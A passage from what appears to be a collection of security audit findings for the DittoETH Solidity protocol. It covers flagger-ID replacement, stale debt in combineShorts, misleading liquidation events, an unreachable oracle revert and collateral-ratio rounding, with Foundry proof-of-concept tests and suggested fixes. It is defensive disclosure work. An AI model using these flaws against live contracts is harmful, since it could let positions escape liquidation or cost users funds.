diamond.flagShort(\\n// Add the line below\\n asset, sender, Constants.SHORT_STARTING_ID // Add the line below\\n 1, uint16(shortRecord1.flaggerId)\\n// Add the line below\\n );\\n// Add the line below\\n shortRecord2 =\\n// Add the line below\\n diamond.getShortRecord(asset, sender, Constants.SHORT_STARTING_ID // Add the line below\\n 1);\\n// Add the line below\\n\\n// Add the line below\\n //flagger1 has been replaced\\n// Add the line below\\n assertEq(diamond.getFlaggerIdCounter(), 2);\\n// Add the line below\\n assertEq(shortRecord2.flaggerId, 1);\\n// Add the line below\\n assertEq(diamond.getFlagger(shortRecord2.flaggerId), flagger2);\\n// Add the line below\\n assertEq(diamond.getFlagger(shortRecord1.flaggerId), flagger2);\\n// Add the line below\\n\\n// Add the line below\\n //ask to liquidate against\\n// Add the line below\\n fundLimitAskOpt(DEFAULT_PRICE, DEFAULT_AMOUNT, receiver);\\n// Add the line below\\n\\n// Add the line below\\n //now flagger1 cannot liquidate shortRecord1\\n// Add the line below\\n vm.prank(flagger1);\\n// Add the line below\\n vm.expectRevert(Errors.MarginCallIneligibleWindow.selector);\\n// Add the line below\\n diamond.liquidate(asset, sender, shortRecord1.id, shortHintArray);\\n// Add the line below\\n\\n// Add the line below\\n //but flagger1 can\\n// Add the line below\\n vm.prank(flagger2);\\n// Add the line below\\n diamond.liquidate(asset, sender, shortRecord1.id, shortHintArray);\\n// Add the line below\\n }\\n// Add the line below\\n\\n function test_FlagShort_FlaggerId_Recycling_AfterIncreaseCollateral() public {\\n createAndFlagShort();\\n \\n```\\nчUpdate the check to `secondLiquidationTime`\\n```\\ndiff // Remove the line below\\n// Remove the line below\\ngit a/contracts/libraries/LibShortRecord.sol b/contracts/libraries/LibShortRecord.sol\\nindex 7c5ecc3..c8736b0 100644\\n// Remove the line below\\n// Remove the line below\\n// Remove the line below\\n a/contracts/libraries/LibShortRecord.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/contracts/libraries/LibShortRecord.sol\\n@@ // Remove the line below\\n391,7 // Add the line below\\n391,7 @@ library LibShortRecord {\\n // Remove the line below\\n s.assetUser[cusd][flaggerToReplace].g_updatedAt\\n : 0;\\n //@dev re// Remove the line below\\nuse an inactive flaggerId\\n// Remove the line below\\n if (timeDiff > LibAsset.firstLiquidationTime(cusd)) {\\n// Add the line below\\n if (timeDiff > LibAsset.secondLiquidationTime(cusd)) {\\n delete s.assetUser[cusd][flaggerToReplace].g_flaggerId;\\n short.flaggerId = flagStorage.g_flaggerId = flaggerHint;\\n } else if (s.flaggerIdCounter < type(uint16).max) {\\n```\\nчFirst flagger will be in loss of the spent gas and expected reward.ч```\\n function setFlagger(\\n STypes.ShortRecord storage short,\\n address cusd,\\n uint16 flaggerHint\\n ) internal {\\n\\n if (flagStorage.g_flaggerId == 0) {\\n address flaggerToReplace = s.flagMapping[flaggerHint];\\n\\n // @audit if timeDiff > firstLiquidationTime, replace the flagger address\\n\\n uint256 timeDiff = flaggerToReplace != address(0)\\n ? LibOrders.getOffsetTimeHours()\\n - s.assetUser[cusd][flaggerToReplace].g_updatedAt\\n : 0;\\n //@dev re-use an inactive flaggerId\\n if (timeDiff > LibAsset.firstLiquidationTime(cusd)) {\\n delete s.assetUser[cusd][flaggerToReplace].g_flaggerId;\\n short.flaggerId = flagStorage.g_flaggerId = flaggerHint;\\n\\n // more code\\n\\n s.flagMapping[short.flaggerId] = msg.sender;\\n```\\n -Combining shorts can incorrectly reset the shorts flagчmediumчThe protocol allows users to combine multiple short positions into one as long as the combined short stays above the primary collateral ratio. The function is also able to reset an active flag from any of the combined shorts if the final ratio is above the primaryLiquidationCR.\\nThe issue is that the combineShorts function does not call updateErcDebt, which is called in every other function that is able to reset a shorts flag. This means that if the debt is outdated the final combined short could incorrectly reset the flag putting the position on a healthy ratio when it really isn't. This would also mean that it will have to be reflagged and go through the timer again before it can be liquidated.\\nThe combine shorts function merges all short records into the short at position id[0]. Focusing on the debt aspect it adds up the total debt and calculates the ercDebtSocialized of all positions except for the first.\\n```\\n {\\n uint88 currentShortCollateral = currentShort.collateral;\\n uint88 currentShortErcDebt = currentShort.ercDebt;\\n collateral += currentShortCollateral;\\n ercDebt += currentShortErcDebt;\\n yield += currentShortCollateral.mul(currentShort.zethYieldRate);\\n ercDebtSocialized += currentShortErcDebt.mul(currentShort.ercDebtRate);\\n }\\n```\\n\\nIt then merges this total to the first position using the merge function and this will give us the combined short.\\n```\\n// Merge all short records into the short at position id[0]\\n firstShort.merge(ercDebt, ercDebtSocialized, collateral, yield, c.shortUpdatedAt);\\n```\\n\\nFinally we check if the position had an active flag and if it did, we check if the new combined short is in a healthy enough state to reset the flag, if not the whole function reverts.\\n```\\n // If at least one short was flagged, ensure resulting c-ratio > primaryLiquidationCR\\n if (c.shortFlagExists) {\\n if (\\n firstShort.getCollateralRatioSpotPrice(\\n LibOracle.getSavedOrSpotOraclePrice(_asset)\\n ) < LibAsset.primaryLiquidationCR(_asset)\\n ) revert Errors.InsufficientCollateral();\\n // Resulting combined short has sufficient c-ratio to remove flag\\n firstShort.resetFlag();\\n }\\n```\\n\\nAs you can see the updateErcDebt function is not called anywhere in the function meaning the flag could be reset with outdated values.чCall updateErcDebt on the short once it is combined in the combineShorts function to ensure the collateral ratio is calculated with the most up to date values.\\n```\\n function combineShorts(address asset, uint8[] memory ids)\\n external\\n isNotFrozen(asset)\\n nonReentrant\\n onlyValidShortRecord(asset, msg.sender, ids[0])\\n {\\n // Initial code\\n\\n // Merge all short records into the short at position id[0]\\n firstShort.merge(ercDebt, ercDebtSocialized, collateral, yield, c.shortUpdatedAt);\\n\\n firstShort.updateErcDebt(asset); // update debt here before checking flag\\n\\n // If at least one short was flagged, ensure resulting c-ratio > primaryLiquidationCR\\n if (c.shortFlagExists) {\\n if (\\n firstShort.getCollateralRatioSpotPrice(\\n LibOracle.getSavedOrSpotOraclePrice(_asset)\\n ) < LibAsset.primaryLiquidationCR(_asset)\\n ) revert Errors.InsufficientCollateral();\\n // Resulting combined short has sufficient c-ratio to remove flag\\n firstShort.resetFlag();\\n }\\n emit Events.CombineShorts(asset, msg.sender, ids);\\n }\\n```\\nчA short could have its flag incorrectly reset and reset the timer. This is not good for the protocol as it will have a unhealthy short for a longer time.ч```\\n {\\n uint88 currentShortCollateral = currentShort.collateral;\\n uint88 currentShortErcDebt = currentShort.ercDebt;\\n collateral += currentShortCollateral;\\n ercDebt += currentShortErcDebt;\\n yield += currentShortCollateral.mul(currentShort.zethYieldRate);\\n ercDebtSocialized += currentShortErcDebt.mul(currentShort.ercDebtRate);\\n }\\n```\\n -Event in secondaryLiquidation could be misused to show false liquidationsчlowчThe `liquidateSecondary` function in the protocol is designed to emit events detailing the specifics of liquidation, which can be crucial for other protocols or front-end integrations that track secondary liquidations within the protocol. One of the values emitted is `batches`, which indicates which positions got liquidated. However the function emits the `batches` array as it initially receives it, even though it may skip positions that are not eligible for liquidation during its execution. This implies that the emitted event could represent incorrect data, indicating positions as liquidated even if they were not, due to their ineligibility.\\n```\\nfunction liquidateSecondary(\\n address asset,\\n MTypes.BatchMC[] memory batches,\\n uint88 liquidateAmount,\\n bool isWallet\\n ) external onlyValidAsset(asset) isNotFrozen(asset) nonReentrant {\\n // Initial code\\n\\n emit Events.LiquidateSecondary(asset, batches, msg.sender, isWallet);\\n }\\n```\\nчEvent in secondaryLiquidation could be misused to show false liquidations\\nModify the `batches` array before emitting it in the event, ensuring it accurately reflects the positions that were actually liquidated.чThis inconsistency in the emitted event data can lead to incorrect data, indicating positions as liquidated even if they were not.ч```\\nfunction liquidateSecondary(\\n address asset,\\n MTypes.BatchMC[] memory batches,\\n uint88 liquidateAmount,\\n bool isWallet\\n ) external onlyValidAsset(asset) isNotFrozen(asset) nonReentrant {\\n // Initial code\\n\\n emit Events.LiquidateSecondary(asset, batches, msg.sender, isWallet);\\n }\\n```\\n -`Errors.InvalidTwapPrice()` is never invoked when `if (twapPriceInEther == 0)` is trueчlowчThe protocol expects to `revert` with `Errors.InvalidTwapPrice()` when twapPriceInEther == 0:\\n```\\nFile: contracts/libraries/LibOracle.sol\\n\\n85 uint256 twapPriceInEther = (twapPrice / Constants.DECIMAL_USDC) * 1 ether;\\n86 uint256 twapPriceInv = twapPriceInEther.inv();\\n87 if (twapPriceInEther == 0) {\\n88 revert Errors.InvalidTwapPrice(); // @audit : unreachable code\\n89 }\\n```\\n\\nHowever, the control never reaches Line 88 when `twapPriceInEther` is zero. It rather reverts before that with error `Division or modulo by 0`.\\nNOTE: Due to this bug, `Errors.InvalidTwapPrice()` is never invoked/thrown by the protocol even under satisfactory conditions, even though it has been defined.\\nSince I could not find any helper function inside `contracts/` or `test/` which lets one set the `twapPrice` returned by uint256 `twapPrice` = IDiamond(payable(address(this))).estimateWETHInUSDC(Constants.UNISWAP_WETH_BASE_AMT, 30 minutes); to zero for testing purposes, I have created a simplified PoC which targets the problem area:\\nSave the following as a file named `test/InvalidTwapPriceErrorCheck.t.sol` and run the test via `forge test --mt testInvalidTwapPriceErrNeverInvoked -vv`. You will find that the test reverts with error `Division or modulo by 0`, but not with `Errors.InvalidTwapPrice()`. The PoC uses the same underlying math libraries and logic path as the protocol does in `contracts/libraries/LibOracle.sol::baseOracleCircuitBreaker()`.\\n```\\n// SPDX-License-Identifier: GPL-3.0-only\\npragma solidity 0.8.21;\\n\\nimport {Constants} from \"contracts/libraries/Constants.sol\";\\nimport {Errors} from \"contracts/libraries/Errors.sol\";\\nimport {U256} from \"contracts/libraries/PRBMathHelper.sol\";\\nimport {OBFixture} from \"test/utils/OBFixture.sol\";\\n\\ncontract InvalidTwapPriceErrorCheck is OBFixture {\\n using U256 for uint256;\\n\\n function getZeroTwapPriceInEther_IncorrectStyle_As_In_Existing_DittoProtocol()\\n internal\\n pure\\n returns (uint256 twapPriceInEther, uint256 twapPriceInv)\\n {\\n // fake the twapPrice to 0\\n uint256 twapPrice = 0; // IDiamond(payable(address(this))).estimateWETHInUSDC(Constants.UNISWAP_WETH_BASE_AMT, 30 minutes);\\n // Following code is copied as-is from\\n // `contracts/libraries/LibOracle.sol::baseOracleCircuitBreaker()#L85-L89`\\n twapPriceInEther = (twapPrice / Constants.DECIMAL_USDC) * 1 ether;\\n twapPriceInv = twapPriceInEther.inv();\\n if (twapPriceInEther == 0) {\\n revert Errors.InvalidTwapPrice(); // @audit : unreachable code\\n }\\n }\\n\\n function getZeroTwapPriceInEther_CorrectStyle()\\n internal\\n pure\\n returns (uint256 twapPriceInEther, uint256 twapPriceInv)\\n {\\n // fake the twapPrice to 0\\n uint256 twapPrice = 0; // IDiamond(payable(address(this))).estimateWETHInUSDC(Constants.UNISWAP_WETH_BASE_AMT, 30 minutes);\\n twapPriceInEther = (twapPrice / Constants.DECIMAL_USDC) * 1 ether;\\n if (twapPriceInEther == 0) { \\n revert Errors.InvalidTwapPrice();\\n }\\n twapPriceInv = twapPriceInEther.inv();\\n }\\n\\n function testInvalidTwapPriceErrNeverInvoked() public pure {\\n getZeroTwapPriceInEther_IncorrectStyle_As_In_Existing_DittoProtocol();\\n }\\n\\n function testInvalidTwapPriceErrInvokedCorrectly() public {\\n vm.expectRevert(Errors.InvalidTwapPrice.selector);\\n getZeroTwapPriceInEther_CorrectStyle();\\n }\\n}\\n```\\n\\n\\nIn the above test file, you can also run the test which invokes the \"fixed\" or \"correct\" code style via `forge test --mt testInvalidTwapPriceErrInvokedCorrectly -vv`. This will invoke the `Errors.InvalidTwapPrice` error, as expected.чThe check on Line 87 (if condition) needs to be performed immediately after Line 85.\\n```\\n 85 uint256 twapPriceInEther = (twapPrice / Constants.DECIMAL_USDC) * 1 ether;\\n// Add the line below\\n 86 if (twapPriceInEther == 0) {\\n// Add the line below\\n 87 revert Errors.InvalidTwapPrice();\\n// Add the line below\\n 88 }\\n// Add the line below\\n 89 uint256 twapPriceInv = twapPriceInEther.inv();\\n// Remove the line below\\n 86 uint256 twapPriceInv = twapPriceInEther.inv();\\n// Remove the line below\\n 87 if (twapPriceInEther == 0) {\\n// Remove the line below\\n 88 revert Errors.InvalidTwapPrice();\\n// Remove the line below\\n 89 }\\n```\\n\\nThe above fix needed to be done because the `inv()` call caused a revert even before control used to reach the `if` condition.чProtocol owner or developer monitoring for a revert due to `Errors.InvalidTwapPrice()` in the logs will never see it and will make debugging & issue resolution harder.ч```\\nFile: contracts/libraries/LibOracle.sol\\n\\n85 uint256 twapPriceInEther = (twapPrice / Constants.DECIMAL_USDC) * 1 ether;\\n86 uint256 twapPriceInv = twapPriceInEther.inv();\\n87 if (twapPriceInEther == 0) {\\n88 revert Errors.InvalidTwapPrice(); // @audit : unreachable code\\n89 }\\n```\\n -Rounding-up of user's `cRatio` causes loss for the protocolчmediumчAt multiple places in the code, user's collateral ratio has been calculated in a manner which causes loss of precision (rounding-up) due to division before multiplication. This causes potential loss for the DittoETH protocol, among other problems.\\nRoot Cause\\nUse of the following piece of code causes rounding-up:\\nStyle 1\\n```\\nuint256 cRatio = short.getCollateralRatioSpotPrice(LibOracle.getSavedOrSpotOraclePrice(asset));\\n```\\n\\nStyle 2\\n```\\nuint256 oraclePrice = LibOracle.getOraclePrice(asset); // or uint256 oraclePrice = LibOracle.getSavedOrSpotOraclePrice(asset); // or uint256 oraclePrice = LibOracle.getPrice(asset);\\n // rest of code\\n // rest of code\\n // rest of code\\nuint256 cRatio = short.getCollateralRatioSpotPrice(oraclePrice);\\n```\\n\\n\\nLet's break the issue down into 4 smaller parts:\\nPART 1:\\nLet us first look inside getOraclePrice():\\n```\\n File: contracts/libraries/LibOracle.sol\\n\\n 20 function getOraclePrice(address asset) internal view returns (uint256) {\\n 21 AppStorage storage s = appStorage();\\n 22 AggregatorV3Interface baseOracle = AggregatorV3Interface(s.baseOracle);\\n 23 uint256 protocolPrice = getPrice(asset);\\n 24 // prettier-ignore\\n 25 (\\n 26 uint80 baseRoundID,\\n 27 int256 basePrice,\\n 28 /*uint256 baseStartedAt*/\\n 29 ,\\n 30 uint256 baseTimeStamp,\\n 31 /*uint80 baseAnsweredInRound*/\\n 32 ) = baseOracle.latestRoundData();\\n 33\\n 34 AggregatorV3Interface oracle = AggregatorV3Interface(s.asset[asset].oracle);\\n 35 if (address(oracle) == address(0)) revert Errors.InvalidAsset();\\n 36\\n 37 if (oracle == baseOracle) {\\n 38 //@dev multiply base oracle by 10**10 to give it 18 decimals of precision\\n 39 uint256 basePriceInEth = basePrice > 0\\n 40 ? uint256(basePrice * Constants.BASE_ORACLE_DECIMALS).inv()\\n 41 : 0;\\n 42 basePriceInEth = baseOracleCircuitBreaker(\\n 43 protocolPrice, baseRoundID, basePrice, baseTimeStamp, basePriceInEth\\n 44 );\\n 45 return basePriceInEth;\\n 46 } else {\\n 47 // prettier-ignore\\n 48 (\\n 49 uint80 roundID,\\n 50 int256 price,\\n 51 /*uint256 startedAt*/\\n 52 ,\\n 53 uint256 timeStamp,\\n 54 /*uint80 answeredInRound*/\\n 55 ) = oracle.latestRoundData();\\n 56 uint256 priceInEth = uint256(price).div(uint256(basePrice));\\n 57 oracleCircuitBreaker(\\n 58 roundID, baseRoundID, price, basePrice, timeStamp, baseTimeStamp\\n 59 );\\n 60 return priceInEth;\\n 61 }\\n 62 }\\n```\\n\\nBased on whether the `oracle` is `baseOracle` or not, the function returns either `basePriceEth` or `priceInEth`.\\n`basePriceEth` can be `uint256(basePrice * Constants.BASE_ORACLE_DECIMALS).inv()` which is basically `1e36 / (basePrice * Constants.BASE_ORACLE_DECIMALS)` or simply written, of the form `oracleN / oracleD` where `oracleN` is the numerator with value 1e36 (as defined here) and `oracleD` is the denominator.\\n`priceInEth` is given as uint256 `priceInEth` = uint256(price).div(uint256(basePrice)) which again is of the form `oracleN / oracleD`.\\n\\nPART 2:\\ngetSavedOrSpotOraclePrice() too internally calls the above `getOraclePrice()` function, if it has been equal to or more than 15 minutes since the last time `LibOrders.getOffsetTime()` was set:\\n```\\n File: contracts/libraries/LibOracle.sol\\n\\n 153 function getSavedOrSpotOraclePrice(address asset) internal view returns (uint256) {\\n 154 if (LibOrders.getOffsetTime() - getTime(asset) < 15 minutes) {\\n 155 return getPrice(asset);\\n 156 } else {\\n 157 return getOraclePrice(asset);\\n 158 }\\n 159 }\\n```\\n\\n\\nPART 3:\\ngetCollateralRatioSpotPrice() calculates `cRatio` as:\\n```\\n File: contracts/libraries/LibShortRecord.sol\\n\\n 30 function getCollateralRatioSpotPrice(\\n 31 STypes.ShortRecord memory short,\\n 32 uint256 oraclePrice\\n 33 ) internal pure returns (uint256 cRatio) {\\n 34 return short.collateral.div(short.ercDebt.mul(oraclePrice));\\n 35 }\\n```\\n\\n\\nPART 4 (FINAL PART):\\nThere are multiple places in the code (mentioned below under Impacts section) which compare the user's `cRatio` to `initialCR` or `LibAsset.primaryLiquidationCR(_asset)` in the following manner:\\n```\\nif (short.getCollateralRatioSpotPrice(LibOracle.getSavedOrSpotOraclePrice(asset)) < LibAsset.primaryLiquidationCR(asset))\\n```\\n\\n\\nCalling `short.getCollateralRatioSpotPrice(LibOracle.getSavedOrSpotOraclePrice(asset))` means the value returned from it would be:\\n```\\n // @audit-issue : Potential precision loss. Division before multiplication should not be done.\\n shortCollateral / (shortErcDebt * (oracleN / oracleD)) // return short.collateral.div(short.ercDebt.mul(oraclePrice));\\n```\\n\\nwhich has the potential for precision loss (rounding-up) due to division before multiplication. The correct style ought to be:\\n```\\n// Add the line below\\n (shortCollateral * oracleD) / (shortErcDebt * oracleN)\\n```\\n\\n\\nHave attempted to keep all values in close proximity to the ones present in forked mainnet tests.\\nLet's assume some values for numerator & denominator and other variables:\\n```\\n uint256 private short_collateral = 100361729669569000000; // ~ 100 ether\\n uint256 private short_ercDebt = 100000000000000000000000; // 100_000 ether\\n uint256 private price = 99995505; // oracleN\\n uint256 private basePrice = 199270190598; // oracleD\\n uint256 private primaryLiquidationCR = 2000000000000000000; // 2 ether (as on forked mainnet)\\n\\n// For this example, we assume that oracle != baseOracle, so that the below calculation would be done by the protocol\\nSo calculated priceInEth = price.div(basePrice) = 501808648347845 // ~ 0.0005 ether\\n```\\n\\n\\nLet's calculate for the scenario of `flagShort()` where the code logic says:\\n```\\n 53 if (\\n 54 short.getCollateralRatioSpotPrice(LibOracle.getSavedOrSpotOraclePrice(asset))\\n 55 >= LibAsset.primaryLiquidationCR(asset) // @audit-issue : this will evaluate to `true`, then revert, due to rounding-up and the short will incorrectly escape flagging\\n 56 ) {\\n 57 revert Errors.SufficientCollateral();\\n 58 }\\n```\\n\\n\\nCreate a file named `test/IncorrectCRatioCheck.t.sol` and paste the following code in it. Some mock functions are included here which mirror protocol's calculation style:\\n```\\n// SPDX-License-Identifier: GPL-3.0-only\\npragma solidity 0.8.21;\\n\\nimport {U256} from \"contracts/libraries/PRBMathHelper.sol\";\\nimport {OBFixture} from \"test/utils/OBFixture.sol\";\\nimport {console} from \"contracts/libraries/console.sol\";\\n\\ncontract IncorrectCRatioCheck is OBFixture {\\n using U256 for uint256;\\n\\n uint256 private short_collateral = 85307470219133700000; // ~ 85.3 ether\\n uint256 private short_ercDebt = 100000000000000000000000; // 100_000 ether\\n uint256 private price = 99995505; // oracleN\\n uint256 private basePrice = 199270190598; // (as on forked mainnet) // oracleD\\n uint256 private primaryLiquidationCR = 1700000000000000000; // 1.7 ether (as on forked mainnet)\\n\\n function _getSavedOrSpotOraclePrice() internal view returns (uint256) {\\n uint256 priceInEth = price.div(basePrice);\\n return priceInEth; // will return 501808648347845 =~ 0.0005 ether // (as on forked mainnet)\\n }\\n\\n function getCollateralRatioSpotPrice_IncorrectStyle_As_In_Existing_DittoProtocol(\\n uint256 oraclePrice\\n ) internal view returns (uint256) {\\n return short_collateral.div(short_ercDebt.mul(oraclePrice));\\n }\\n\\n function getCollateralRatioSpotPrice_CorrectStyle(uint256 oracleN, uint256 oracleD)\\n internal\\n view\\n returns (uint256)\\n {\\n return (short_collateral.mul(oracleD)).div(short_ercDebt.mul(oracleN));\\n }\\n\\n /* solhint-disable no-console */\\n function test_GetCollateralRatioSpotPrice_IncorrectStyle_As_In_Existing_DittoProtocol(\\n ) public view {\\n uint256 cRatio =\\n getCollateralRatioSpotPrice_IncorrectStyle_As_In_Existing_DittoProtocol(\\n _getSavedOrSpotOraclePrice()\\n );\\n console.log(\"cRatio calculated (existing style) =\", cRatio);\\n if (cRatio >= primaryLiquidationCR) {\\n console.log(\"Errors.SufficientCollateral; can not be flagged\");\\n } else {\\n console.log(\"InsufficientCollateral; can be flagged\");\\n }\\n }\\n\\n /* solhint-disable no-console */\\n function test_GetCollateralRatioSpotPrice_CorrectStyle() public view {\\n uint256 cRatio = getCollateralRatioSpotPrice_CorrectStyle(price, basePrice);\\n console.log(\"cRatio calculated (correct style) =\", cRatio);\\n if (cRatio >= primaryLiquidationCR) {\\n console.log(\"Errors.SufficientCollateral; can not be flagged\");\\n } else {\\n console.log(\"InsufficientCollateral; can be flagged\");\\n }\\n }\\n}\\n```\\n\\n\\nFirst, let's see the output as per protocol's calculation. Run forge test --mt test_GetCollateralRatioSpotPrice_IncorrectStyle_As_In_Existing_DittoProtocol -vv:\\n```\\nLogs:\\n cRatio calculated (existing style) = 1700000000000000996\\n Errors.SufficientCollateral; can not be flagged\\n```\\n\\nSo the short can not be flagged as `cRatio > primaryLiquidationCR` of 1700000000000000000.\\nNow, let's see the output as per the correct calculation. Run forge test --mt test_GetCollateralRatioSpotPrice_CorrectStyle -vv:\\n```\\nLogs:\\n cRatio calculated (correct style) = 1699999999999899995\\n InsufficientCollateral; can be flagged\\n```\\n\\nShort's cRatio is actually below primaryLiquidationCR. Should have been flagged ideally.\\nчThese steps need to be taken to fix the issue. Developer may have to make some additional changes since `.mul`, `.div`, etc are being used from the `PRBMathHelper.sol` library. Following is the general workflow required:\\nCreate additional functions to fetch oracle parameters instead of price: Create copies of `getOraclePrice()` and `getSavedOrSpotOraclePrice()`, but these ones return `oracleN` & `oracleD` instead of the calculated price. Let's assume the new names to be `getOraclePriceParams()` and `getSavedOrSpotOraclePriceParams()`.\\nCreate a new function to calculate cRatio which will be used in place of the above occurences of getCollateralRatioSpotPrice():\\n```\\n function getCollateralRatioSpotPriceFromOracleParams(\\n STypes.ShortRecord memory short,\\n uint256 oracleN,\\n uint256 oracleD\\n ) internal pure returns (uint256 cRatio) {\\n return (short.collateral.mul(oracleD)).div(short.ercDebt.mul(oracleN));\\n }\\n```\\n\\n\\nFor fixing the last issue of `oraclePrice.mul(1.01 ether)` on L847, first call `getOraclePriceParams()` to get `oracleN` & `oracleD` and then:\\n```\\n 845 //@dev: force hint to be within 1% of oracleprice\\n 846 bool startingShortWithinOracleRange = shortPrice\\n// Remove the line below\\n 847 <= oraclePrice.mul(1.01 ether)\\n// Add the line below\\n 847 <= (oracleN.mul(1.01 ether)).div(oracleD)\\n 848 && s.shorts[asset][prevId].price >= oraclePrice;\\n```\\nч```\\n File: contracts/facets/YieldFacet.sol\\n\\n 76 function _distributeYield(address asset)\\n 77 private\\n 78 onlyValidAsset(asset)\\n 79 returns (uint88 yield, uint256 dittoYieldShares)\\n 80 {\\n 81 uint256 vault = s.asset[asset].vault;\\n 82 // Last updated zethYieldRate for this vault\\n 83 uint80 zethYieldRate = s.vault[vault].zethYieldRate;\\n 84 // Protocol time\\n 85 uint256 timestamp = LibOrders.getOffsetTimeHours();\\n 86 // Last saved oracle price\\n 87 uint256 oraclePrice = LibOracle.getPrice(asset);\\n 88 // CR of shortRecord collateralized at initialMargin for this asset\\n 89 uint256 initialCR = LibAsset.initialMargin(asset) + 1 ether;\\n 90 // Retrieve first non-HEAD short\\n 91 uint8 id = s.shortRecords[asset][msg.sender][Constants.HEAD].nextId;\\n 92 // Loop through all shorter's shorts of this asset\\n 93 while (true) {\\n 94 // One short of one shorter in this market\\n 95 STypes.ShortRecord storage short = s.shortRecords[asset][msg.sender][id];\\n 96 // To prevent flash loans or loans where they want to deposit to claim yield immediately\\n 97 bool isNotRecentlyModified =\\n 98 timestamp - short.updatedAt > Constants.YIELD_DELAY_HOURS;\\n 99 // Check for cancelled short\\n 100 if (short.status != SR.Cancelled && isNotRecentlyModified) {\\n 101 uint88 shortYield =\\n 102 short.collateral.mulU88(zethYieldRate - short.zethYieldRate);\\n 103 // Yield earned by this short\\n 104 yield += shortYield;\\n 105 // Update zethYieldRate for this short\\n 106 short.zethYieldRate = zethYieldRate;\\n 107 // Calculate CR to modify ditto rewards\\n 108 uint256 cRatio = short.getCollateralRatioSpotPrice(oraclePrice);\\n 109 if (cRatio <= initialCR) {\\n 110 dittoYieldShares += shortYield;\\n 111 } else {\\n 112 // Reduce amount of yield credited for ditto rewards proportional to CR\\n 113 dittoYieldShares += shortYield.mul(initialCR).div(cRatio);\\n 114 }\\n 115 }\\n 116 // Move to next short unless this is the last one\\n 117 if (short.nextId > Constants.HEAD) {\\n 118 id = short.nextId;\\n 119 } else {\\n 120 break;\\n 121 }\\n 122 }\\n 123 }\\n```\\n\\nThis rounding-up can lead to user's `cRatio` to be considered as `>initialCR` even when it's slightly lower. This results in greater `dittoYieldShares` being calculated.\\n```\\n File: contracts/facets/MarginCallPrimaryFacet.sol\\n\\n 43 function flagShort(address asset, address shorter, uint8 id, uint16 flaggerHint)\\n 44 external\\n 45 isNotFrozen(asset)\\n 46 nonReentrant\\n 47 onlyValidShortRecord(asset, shorter, id)\\n 48 {\\n 49 if (msg.sender == shorter) revert Errors.CannotFlagSelf();\\n 50 STypes.ShortRecord storage short = s.shortRecords[asset][shorter][id];\\n 51 short.updateErcDebt(asset);\\n 52\\n 53 if (\\n 54 short.getCollateralRatioSpotPrice(LibOracle.getSavedOrSpotOraclePrice(asset))\\n 55 >= LibAsset.primaryLiquidationCR(asset) // @audit-issue : this will evaluate to `true` due to rounding-up and the short will not be eligible for flagging\\n 56 ) {\\n 57 revert Errors.SufficientCollateral();\\n 58 }\\n 59\\n 60 uint256 adjustedTimestamp = LibOrders.getOffsetTimeHours();\\n 61\\n 62 // check if already flagged\\n 63 if (short.flaggerId != 0) {\\n 64 uint256 timeDiff = adjustedTimestamp - short.updatedAt;\\n 65 uint256 resetLiquidationTime = LibAsset.resetLiquidationTime(asset);\\n 66\\n 67 if (timeDiff <= resetLiquidationTime) {\\n 68 revert Errors.MarginCallAlreadyFlagged();\\n 69 }\\n 70 }\\n 71\\n 72 short.setFlagger(cusd, flaggerHint);\\n 73 emit Events.FlagShort(asset, shorter, id, msg.sender, adjustedTimestamp);\\n 74 }\\n```\\n\\n\\n```\\n File: contracts/facets/MarginCallSecondaryFacet.sol\\n\\n 38 function liquidateSecondary(\\n 39 address asset,\\n 40 MTypes.BatchMC[] memory batches,\\n 41 uint88 liquidateAmount,\\n 42 bool isWallet\\n 43 ) external onlyValidAsset(asset) isNotFrozen(asset) nonReentrant {\\n 44 STypes.AssetUser storage AssetUser = s.assetUser[asset][msg.sender];\\n 45 MTypes.MarginCallSecondary memory m;\\n 46 uint256 minimumCR = LibAsset.minimumCR(asset);\\n 47 uint256 oraclePrice = LibOracle.getSavedOrSpotOraclePrice(asset);\\n 48 uint256 secondaryLiquidationCR = LibAsset.secondaryLiquidationCR(asset);\\n 49\\n 50 uint88 liquidatorCollateral;\\n 51 uint88 liquidateAmountLeft = liquidateAmount;\\n 52 for (uint256 i; i < batches.length;) {\\n 53 m = _setMarginCallStruct(\\n 54 asset, batches[i].shorter, batches[i].shortId, minimumCR, oraclePrice\\n 55 );\\n 56\\n\\n // rest of code// rest of code\\n // rest of code// rest of code\\n // rest of code// rest of code\\n\\n\\n 129 function _setMarginCallStruct(\\n 130 address asset,\\n 131 address shorter,\\n 132 uint8 id,\\n 133 uint256 minimumCR,\\n 134 uint256 oraclePrice\\n 135 ) private returns (MTypes.MarginCallSecondary memory) {\\n 136 LibShortRecord.updateErcDebt(asset, shorter, id);\\n 137\\n 138 MTypes.MarginCallSecondary memory m;\\n 139 m.asset = asset;\\n 140 m.short = s.shortRecords[asset][shorter][id];\\n 141 m.vault = s.asset[asset].vault;\\n 142 m.shorter = shorter;\\n 143 m.minimumCR = minimumCR;\\n 144 m.cRatio = m.short.getCollateralRatioSpotPrice(oraclePrice);\\n 145 return m;\\n 146 }\\n```\\n\\n\\n```\\n File: contracts/facets/ShortRecordFacet.sol\\n\\n 117 function combineShorts(address asset, uint8[] memory ids)\\n 118 external\\n 119 isNotFrozen(asset)\\n 120 nonReentrant\\n 121 onlyValidShortRecord(asset, msg.sender, ids[0])\\n 122 {\\n 123 if (ids.length < 2) revert Errors.InsufficientNumberOfShorts();\\n 124 // First short in the array\\n 125 STypes.ShortRecord storage firstShort = s.shortRecords[asset][msg.sender][ids[0]];\\n \\n // rest of code// rest of code\\n // rest of code// rest of code\\n // rest of code// rest of code\\n\\n 174\\n 175 // Merge all short records into the short at position id[0]\\n 176 firstShort.merge(ercDebt, ercDebtSocialized, collateral, yield, c.shortUpdatedAt);\\n 177\\n 178 // If at least one short was flagged, ensure resulting c-ratio > primaryLiquidationCR\\n 179 if (c.shortFlagExists) {\\n 180 if (\\n 181 firstShort.getCollateralRatioSpotPrice(\\n 182 LibOracle.getSavedOrSpotOraclePrice(_asset)\\n 183 ) < LibAsset.primaryLiquidationCR(_asset)\\n 184 ) revert Errors.InsufficientCollateral();\\n 185 // Resulting combined short has sufficient c-ratio to remove flag\\n 186 firstShort.resetFlag();\\n 187 }\\n 188 emit Events.CombineShorts(asset, msg.sender, ids);\\n 189 }\\n```\\n\\n\\nNOTE:\\nWhile the operation done in this piece of code is a bit different from the above analysis, I am clubbing it with this bug report as the underlying issue is the same (and the resolution would be similar): Multiplication and division operations should not be done directly on top of fetched oracle price, without paying attention to new order of evaluation:\\n```\\n File: contracts/libraries/LibOrders.sol\\n\\n 812 function 